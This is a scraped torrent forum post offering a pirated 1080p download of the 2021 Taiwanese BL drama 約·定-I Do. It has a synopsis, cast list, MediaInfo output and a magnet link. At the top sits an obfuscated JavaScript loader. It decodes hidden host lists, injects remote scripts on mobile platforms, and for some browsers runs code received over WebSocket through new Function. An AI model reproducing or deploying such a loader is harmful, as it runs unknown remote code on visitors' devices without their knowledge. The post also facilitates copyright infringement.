约定.約·定-I Do[全12集][国语中字&无字.无水印][WEB-DL-MKV][1080P][Vampire][有生之年系列]

版主小s 1月前 430

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};


◎译  名 约定 / Be Loved in House / Be Loved in House 約・定~I do / BLiH / 两颗心在房里被爱系列之约定

◎片  名 約·定-I Do

◎年  代 2021

◎产  地 中国台湾

◎类  别 爱情 / 同性

◎语  言 汉语普通话

◎上映日期 2021-05-20(中国台湾)

◎豆瓣评分 6.7/10 from 1418 users

◎豆瓣链接 https://movie.douban.com/subject/35332616

◎集  数 12

◎片  长 23分钟

◎主  演 赖东贤 Aaron Lai

       李迪恩 Deyn Lee

       林家佑 Jia You Lin

       王硕瀚 Hank Wang

       陈希腾 Xiteng Chen

       廖偉博 Liao Wei Po

       余杰恩 Jie En Yu


◎标  签 同性 | 台湾 | BL | 腐剧 | 台腐 | 中国台湾 | 2021 | 电视剧


◎简  介


  當你的霸氣,遇上了我的倔強,

  我鋼鐵般的世界,闖進一個不速之客,

  當所有衝突一步步在我心裡刻畫出你的存在。

  小王子遇上狐狸,究竟誰馴服了誰?你我是依存還是愛戀?

  這一切的故事,從我們之間的約‧定開始......

  Be Loved in House 系列首部作品-「約‧定」,

  當鋼鐵總監與傲嬌員工相遇在同個屋簷下,發展出一段辦公室禁忌的愛戀......



General

Unique ID                      : 305142617560369247975189947497822638374 (0xE590549829B47E685869A75350ED5126)

Complete name                  : 高清电视剧\約·定-I.Do.Be.Loved.in.House.2021.EP01-12.Complete.1080P.WEB-DL.X264.AAC-Vampire\約·定-I.Do.Be.Loved.in.House.2021.EP12.1080P.WEB-DL.X264.AAC-Vampire.mkv

Format                         : Matroska

Format version                 : Version 4

File size                      : 376 MiB

Duration                       : 30 min 21 s

Overall bit rate               : 1 731 kb/s

Movie name                     : 約·定-I.Do/Be.Loved.in.House

Encoded date                   : UTC 2021-08-02 06:46:35

Writing application            : mkvmerge v55.0.0 ('Waiting For Space') 64-bit

Writing library                : libebml v1.4.2 + libmatroska v1.6.4

Cover                          : Yes

Comment                        : 警告:严禁将任何作品用于商业性质活动,所有制作作品仅限于测试宽带之用,请于下载后24小时内删除。本人不承担任何法律后果!喜欢本作品请购买正版!!!

Attachments                    : Cover.jpg

ARTIST                         : Vampire制作分享作品

DATE_RECORDED                  : 2021

GENRE                          : 中国台湾


Video

ID                             : 1

Format                         : AVC

Format/Info                    : Advanced Video Codec

Format profile                 : [email protected]

Format settings                : CABAC / 4 Ref Frames

Format settings, CABAC         : Yes

Format settings, Reference fra : 4 frames

Codec ID                       : V_MPEG4/ISO/AVC

Duration                       : 30 min 21 s

Bit rate                       : 1 634 kb/s

Width                          : 1 920 pixels

Height                         : 1 080 pixels

Display aspect ratio           : 16:9

Frame rate mode                : Constant

Frame rate                     : 29.970 (29970/1000) FPS

Color space                    : YUV

Chroma subsampling             : 4:2:0

Bit depth                      : 8 bits

Scan type                      : Progressive

Bits/(Pixel*Frame)             : 0.026

Stream size                    : 355 MiB (94%)

Title                          : Vampire制作分享作品

Writing library                : ptw-1.0.134 rcm-adapt vs-93 dil

Language                       : Chinese

Default                        : Yes

Forced                         : No

Color range                    : Limited

Color primaries                : BT.709

Transfer characteristics       : BT.709

Matrix coefficients            : BT.709


Audio

ID                             : 2

Format                         : AAC LC

Format/Info                    : Advanced Audio Codec Low Complexity

Codec ID                       : A_AAC-2

Duration                       : 30 min 21 s

Bit rate                       : 93.4 kb/s

Channel(s)                     : 2 channels

Channel layout                 : L R

Sampling rate                  : 48.0 kHz

Frame rate                     : 46.875 FPS (1024 SPF)

Compression mode               : Lossy

Stream size                    : 20.3 MiB (5%)

Title                          : 汉语普通话

Language                       : Chinese

Default                        : Yes

Forced                         : No

PS:由于片源原因部分有字,部分无字,但无水印,码率稍低,介意勿下!


TAGS 爱情 同性

磁力链:
  • magnet:?xt=urn:btih:AAD28D7528A79A2E733F30FC4D138AEB7BC124ED
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回